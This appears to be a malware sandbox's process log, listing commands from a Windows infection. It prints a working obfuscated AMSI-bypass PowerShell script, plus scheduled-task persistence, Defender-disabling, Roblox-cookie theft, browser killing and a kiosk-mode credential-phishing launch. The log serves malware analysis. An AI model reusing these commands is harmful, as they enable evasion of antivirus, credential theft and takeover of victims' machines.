$_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'32'+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'eN'+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$GvVfYMGezrKWqS=$SSTtORKJSyANf.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+''+'o'+''+[Char](99)+'Ad'+'d'+''+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'St'+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tQuHHGxfUeQuIWLldYT=xbLNqjNtmRQe @([String])([IntPtr]);$ySZAAdwBYvoTaUNctyaNwK=xbLNqjNtmRQe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xjpwwyZMdlA=$SSTtORKJSyANf.GetMethod(''+'G'+''+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+'an'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+'d'+'l'+'l')));$QPKcBQpnZJYrEi=$GvVfYMGezrKWqS.Invoke($Null,@([Object]$xjpwwyZMdlA,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+''+[Char](114)+'ar'+'y'+''+'A'+'')));$BFzxBMUsyPLmRXKmP=$GvVfYMGezrKWqS.Invoke($Null,@([Object]$xjpwwyZMdlA,[Object]('V'+[Char](105)+'r'+'t'+'u'+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$RGyzash=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QPKcBQpnZJYrEi,$tQuHHGxfUeQuIWLldYT).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+'l'+'');$nYhimeaHNTbJrjVAl=$GvVfYMGezrKWqS.Invoke($Null,@([Object]$RGyzash,[Object]('A'+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+'a'+''+'n'+'B'+'u'+''+[Char](102)+'fe'+[Char](114)+'')));$aDyDSmaBsX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BFzxBMUsyPLmRXKmP,$ySZAAdwBYvoTaUNctyaNwK).Invoke($nYhimeaHNTbJrjVAl,[uint32]8,4,[ref]$aDyDSmaBsX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nYhimeaHNTbJrjVAl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BFzxBMUsyPLmRXKmP,$ySZAAdwBYvoTaUNctyaNwK).Invoke($nYhimeaHNTbJrjVAl,[uint32]8,0x20,[ref]$aDyDSmaBsX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+'R'+''+'E'+'').GetValue(''+[Char](114)+''+'u'+''+[Char](116)+''+'s'+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
"C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 1060 -ip 1060
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1060 -s 1432
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe
"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-C6FGJ.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C6FGJ.tmp\jy.tmp" /SL5="$80052,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7348 -ip 7348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1200
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'
C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7796 -s 696
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BYZnzpPaBDhP.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{721497be-8321-4fae-997c-d91e86796f2b}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{721497be-8321-4fae-997c-d91e86796f2b}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{721497be-8321-4fae-997c-d91e86796f2b}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{721497be-8321-4fae-997c-d91e86796f2b}
C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe
"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"
C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
"C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B70D5D1A518720B1DC875C0BC4882A70
C:\Users\Admin\AppData\Local\Temp\a\leto.exe
"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\dxwsetup.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 236 -p 7016 -ip 7016
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7016 -s 1196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6608 -ip 6608
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Y06E.exe
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6976 -ip 6976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1288
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Users\Admin\AppData\Local\Temp\1014474001\eccbe79ce7.exe
"C:\Users\Admin\AppData\Local\Temp\1014474001\eccbe79ce7.exe"
C:\Users\Admin\AppData\Local\Temp\1014474001\eccbe79ce7.exe
"C:\Users\Admin\AppData\Local\Temp\1014474001\eccbe79ce7.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\1014478001\1a1deaa0c6.exe
"C:\Users\Admin\AppData\Local\Temp\1014478001\1a1deaa0c6.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\1014479001\31e8fbfe83.exe
"C:\Users\Admin\AppData\Local\Temp\1014479001\31e8fbfe83.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014478001\1a1deaa0c6.exe" & rd /s /q "C:\ProgramData\6XLX4OZU37QQ" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3048 -ip 3048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 1760
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\1014480001\d4577f4647.exe
"C:\Users\Admin\AppData\Local\Temp\1014480001\d4577f4647.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\1014481001\5b90a0f71d.exe
"C:\Users\Admin\AppData\Local\Temp\1014481001\5b90a0f71d.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1388 -ip 1388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 76
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1014482001\42ff40c8fe.exe
"C:\Users\Admin\AppData\Local\Temp\1014482001\42ff40c8fe.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1172 -ip 1172
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1292
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Users\Admin\AppData\Local\Temp\1014483001\e9fc7878e7.exe
"C:\Users\Admin\AppData\Local\Temp\1014483001\e9fc7878e7.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1960 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {695fdc99-9c14-4088-8fd2-82e13ff60aa7} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" gpu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7936 -ip 7936
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2400 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ff6d755-1ecd-4f2d-b79d-19b203b3b745} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2984 -prefMapHandle 2980 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a999c00c-d2ae-479f-9769-4657347e0483} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 588
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3808 -childID 2 -isForBrowser -prefsHandle 3800 -prefMapHandle 2288 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fccf914-d421-4608-bab0-b9c0d31b20e6} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4364 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4320 -prefMapHandle 4376 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {efdb3963-7264-4a21-a947-7c20a389a8f1} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" utility
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4528 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 4680 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f87ba6af-1788-437a-b1e1-d9e102d31a59} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 4 -isForBrowser -prefsHandle 5516 -prefMapHandle 5524 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0b7409a-33cf-45a1-b9db-8103ddfd1a1c} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5788 -childID 5 -isForBrowser -prefsHandle 5704 -prefMapHandle 5708 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40a69e64-a001-49d3-b48f-7e182efe9152} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 8896 -ip 8896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8896 -s 612
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
